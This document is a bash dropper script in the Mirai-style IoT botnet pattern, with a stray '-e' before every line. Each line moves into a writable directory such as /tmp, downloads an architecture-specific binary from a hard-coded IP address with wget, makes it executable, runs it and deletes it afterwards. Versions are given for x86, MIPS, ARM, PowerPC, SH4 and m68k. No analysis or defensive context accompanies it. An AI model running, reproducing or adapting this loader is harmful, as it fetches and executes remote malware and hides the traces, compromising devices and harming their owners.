-e #!/bin/bash
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_x86_64; chmod +x main_x86_64; ./main_x86_64; rm -rf main_x86_64
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_x86; chmod +x main_x86; ./main_x86; rm -rf main_x86
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_sh4; chmod +x main_sh4; ./main_sh4; rm -rf main_sh4
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_ppc; chmod +x main_ppc; ./main_ppc; rm -rf main_ppc
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_mpsl; chmod +x main_mpsl; ./main_mpsl; rm -rf main_mpsl
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_mips; chmod +x main_mips; ./main_mips; rm -rf main_mips
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_m68k; chmod +x main_m68k; ./main_m68k; rm -rf main_m68k
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_arm7; chmod +x main_arm7; ./main_arm7; rm -rf main_arm7
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_arm6; chmod +x main_arm6; ./main_arm6; rm -rf main_arm6
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_arm5; chmod +x main_arm5; ./main_arm5; rm -rf main_arm5
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.42.88.168/main_arm; chmod +x main_arm; ./main_arm; rm -rf main_arm
